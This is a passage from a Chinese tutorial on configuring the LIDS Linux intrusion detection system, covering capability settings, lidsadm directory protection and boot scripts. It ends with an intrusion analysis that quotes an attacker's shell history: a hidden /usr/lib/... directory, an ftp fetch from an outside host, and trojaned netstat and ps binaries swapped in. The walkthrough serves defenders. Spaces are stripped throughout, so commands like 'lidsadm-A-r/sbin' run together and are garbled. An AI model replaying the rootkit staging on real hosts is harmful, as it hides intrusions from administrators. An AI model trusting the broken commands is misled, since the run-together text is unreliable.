网络安全初体验之IDS入侵检测详解二

第第页网络安全初体验之IDS入侵检测详解二ccess/dev/mem(xfree,etc.)

[]Allowsomeknownprocessestoaccessrawdiskdevices

[]Allowsomeknownprocessestoaccessioports

[]Allowsomeknownprocessestochangeroutes

SpecialUPS

[*]Allowsomeknownprocessestounmountdevices

Allowedprocesses:"/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"

[*]Unmountingcapabilityisinherited

[*]Allowsomeknownprocessestokillinitchildren

Allowedprocesses:"/etc/rc.d/init.d/halt"

[*]Killingcapabilityisinherited

看得出，我没有使用UPS，同时运行的是一个需要能够远程访问的服务器，我就按照上面的文件进行了配置，但是在实际应用过程中，每个人的系统根据环境不一样，会有一些差别。

配置LIDS:

有一条特别要引起注意：在你的系统的下一次重启之前就应该配置好LIDS！我们应该使用lidsam来配置LIDS的配置文件/etc/lids.conf，而不能手动的修改。运行"lidsadm-h"可以获得一些关于如何使用lidsadm这个程序的帮助。LIDS提供了很多使用LIDS保护文件的例子，例如：

lidsadm-A-r/sbin这条命令保护/sbin整个目录，并且表示只读。

我首先的LIDS配置文件应该是这样的：

lidsadm-Zlidsadm-A-r/usr/bin

lidsadm-A-r/bin

lidsadm-A-r/usr/sbin

lidsadm-A-r/sbin

lidsadm-A-r/usr/X11R6/bin

lidsadm-A-r/etc/rc.d

lidsadm-A-r/etc/sysconfig

一旦配置了LIDS的配置文件，就应该修改系统的启动文件保证在系统启动的时候就能运行LIDS，这样就能有效的在内核中启动LIDS的作用。一般我都是把lidsadm加到/etc/rc.d/rc.local的末尾，这样能够保证LIDS的功能不会妨碍系统的其他应用程序的正常启动。下面就是我加在/etc/rc/d/rc.local中用来启动LIDS的脚本：

/sbin/lidsadm-I---CAP_SYS_MODULE-CAP_SYS_RAWIO

-CAP_SYS_ADMIN-CAP_SYS_PTRACE-CAP_NET_ADMIN-CAP_LINUX_IMMUTABLE

+INIT_CHILDREN_LOCK

配置lilo

我们知道，使用Redhat的RPMS升级系统内核以后需要重新配置lilo.conf来保证编译加载过LIDS的新内核能够正常的启动。在下次重启之后，LIDS将会在系统中运行，不过如果你需要停止LIDS而执行一些系统的任务，就应该按照下面的命令进行：

/sbin/lidsadm-S---LIDS或者/sbin/lidsadm-S---LIDS_GLOBAL

你需要提供LIDS的口令，当时在编译内核的时候在内核中加入了RipeMD-160格式。不知道你是否注意到了，在shutdown的脚本中，很多脚本都不能正常的工作。最终的shutdown脚本/etc/rc.d/init.d/halt将会停止所有的进程和卸载文件系统。由于在文件rc.local中"+INIT_CHILDREN_LOCK"的保护作用，其他的进程都没有权限来杀掉init()的其他子进程。同时每隔10分钟，你就会收到一个关于"rmmodas"不能卸载模块的出错信息。这个主要是由于LIDS启动以后"-CAP_SYS_MODULE"的保护使得模块的插入或者卸载出现了毛病。我们可以删除/etc/cron.d/kmod这个文件来防止出错信息继续发生。

LIDS能够保护什么？

快速的浏览LIDS的文档就可以了解LIDS的一系列特性。而我认为下面的这些特性是最重要的：

CAP_LINUX_IMMUTABLE当文件和外那间系统被标识"immutable"防止被写；CAP_NET_ADMIN防止篡改网络配置（例如：防止路由表被修改）；

CAP_SYS_MODULE防止内核模块被插入或者移除；CAP_SYS_RAWIO防止损坏磁盘或者设备I/O；

CAP_SYS_ADMIN防止大范围的使用其他系统功能；

INIT_CHILDREN_LOCKwhichpreventschildprocessesoftheinit()masterprocessfrombeingtamperedwith.

无论在哪个点，上面这些特性都能够通过命令"lidsadm-I"来启动，通过"lidsadm-S"来禁用（可以允许真正的系统管理员来进行系统配置），同时提供已经安装在内核中的LIDS口令（是通过RipeMD-160加密的）。

剖析一次入侵

当黑客把一些系统守护进程的缓冲区溢出以后就可以获得root权限，这个时候就是主机被入侵了（事实上是不可能发生的，但是安装Linux系统的人忘记了打上RedHat最新的关于缓冲区溢出的补丁程序，并且让系统一直运行着）。当然一些黑客也不够小心，当他们侵入主机后，很急切的获得了shell，但是他们经常没有考虑到BASH的命令将会被存入系统日志文件中，简单的阅读/.bash_history就可以了解黑客到底怎么机器上面作了一些什么事情。这个文件我们可以看看（为了更加简单我们做过一些细微的修改）：mkdir/usr/lib/...;cd/usr/lib/...ftp0121

cd/usr/lib/...

mvnetstat.gz?netstat.gz;mvps.gz?ps.gz;mvpstree.gz?pstree.gz;

mvpt07.gz